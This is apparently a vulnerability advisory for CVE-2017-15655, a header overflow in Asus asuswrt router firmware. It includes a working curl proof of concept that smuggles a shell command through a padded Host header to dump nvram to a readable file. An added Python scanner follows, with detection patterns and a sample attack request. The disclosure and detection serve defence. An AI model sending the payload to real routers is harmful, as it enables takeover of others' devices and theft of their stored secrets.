Heap buffer overflow in multiple HTTP headers allows for an unauthenticated remote code execution.

ALERT! Users whose routers cannot be upgraded beyond 3.0.0.4.376.* should CLOSE HTTP access from the WAN and should restrict access to the management port from the LAN as well!

CVE: CVE-2017-15655

CVSS v3: 9.6
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
(The administrator needs to log in and visit a certain page on the router's web interface)

Description:

This vulnerability affects newer Asus routers running outdated firmware, as well as some older end-of-life routers (e.g. RT-N65R, RT-N65U).

Multiple buffer overflow vulnerabilities exist in the HTTPd server of Asus asuswrt version <=3.0.0.4.376.X. All have been fixed in version 3.0.0.4.378, but the vulnerability was not previously disclosed. Some end-of-life routers have the vulnerable version as their newest firmware, so they remain vulnerable at this time. The vulnerability allows RCE with administrator rights when the administrator visits any of several pages.

For example, the “Host:” header is vulnerable and allows overriding the SystemCmd variable, which then leads to RCE when the administrator visits any of several pages (for example the Network Tools tab of the router interface).

PoC (after running this script, when the administrator visits one of the several pages which trigger commands, e.g. the Network Tools tab, the injected command is run and writes the contents of nvram to a CSS file which can be retrieved without authentication):

$ curl 'http://routerIP:8080' -H "Host: xxxxxxxxxxxxxx $(for i in $(seq 1 9700); do echo -n " "; done)  \$(nvram show > /www/user/nvram.css )"
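As an added defensive check, not part of this advisory: a small Python scanner that flags HTTP request heads whose header values are oversized or contain shell command substitution, the shape of the PoC above. Because the advisory says multiple headers are affected, it inspects every header rather than only Host; the length thresholds, the metacharacter pattern and the two sample requests are assumptions constructed for illustration.

```python
"""Flag HTTP request heads whose header values look like the CVE-2017-15655
PoC against asuswrt httpd (<= 3.0.0.4.376.x). Thresholds are assumptions."""
from __future__ import annotations
import re

MAX_VALUE_LEN = 1024                  # legitimate header values stay far below this
MAX_HOST_LEN = 255                    # DNS name limit, leaves room for ":port"
SHELL_META = re.compile(r"\$\(|`|\$\{")               # $( ... ), backtick, ${ ... }
VALID_HOST = re.compile(r"^[A-Za-z0-9.\-]+(:\d{1,5})?$")  # hostname/IPv4 + optional port


def parse_request_head(raw: bytes) -> tuple[str, list[tuple[str, str]]]:
    """Split a raw HTTP/1.x request head into the request line and an ordered
    list of (lowercased name, value) pairs; duplicate headers are all kept."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return request_line, headers


def assess_header(name: str, value: str) -> list[str]:
    """Return the findings for one header value; an empty list means clean."""
    findings = []
    if len(value) > MAX_VALUE_LEN:
        findings.append("oversized")
    if SHELL_META.search(value):
        findings.append("shell-metachar")
    if name == "host" and (len(value) > MAX_HOST_LEN or not VALID_HOST.match(value)):
        findings.append("malformed-host")
    return findings


def scan_request(raw: bytes) -> dict[str, list[str]]:
    """Map each suspicious header name in one request to its findings."""
    _, headers = parse_request_head(raw)
    report: dict[str, list[str]] = {}
    for name, value in headers:
        for hit in assess_header(name, value):
            if hit not in report.setdefault(name, []):
                report[name].append(hit)
    return report


# Constructed sample traffic: a normal admin request and one shaped like the PoC.
BENIGN = b"GET /index.asp HTTP/1.1\r\nHost: 192.168.1.1:8080\r\nUser-Agent: curl/7.55\r\n\r\n"
POC_LIKE = (b"GET / HTTP/1.1\r\nHost: xxxxxxxxxxxxxx" + b" " * 9700
            + b"$(nvram show > /www/user/nvram.css )\r\nUser-Agent: curl/7.55\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("poc-like", POC_LIKE)):
        print(label, scan_request(req) or "clean")
```

Run it against captured request heads from a reverse proxy or packet capture in front of the router; any "oversized" or "shell-metachar" hit on the management port is worth an alert.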

Timeline:

  • 17.09.2017 - vendor notified
  • 18.09.2017 - vendor REFUSED to fix the vulnerability as the routers using the vulnerable firmware are already EOL

Video:




tags: CVE ASUS CVE-2017-15655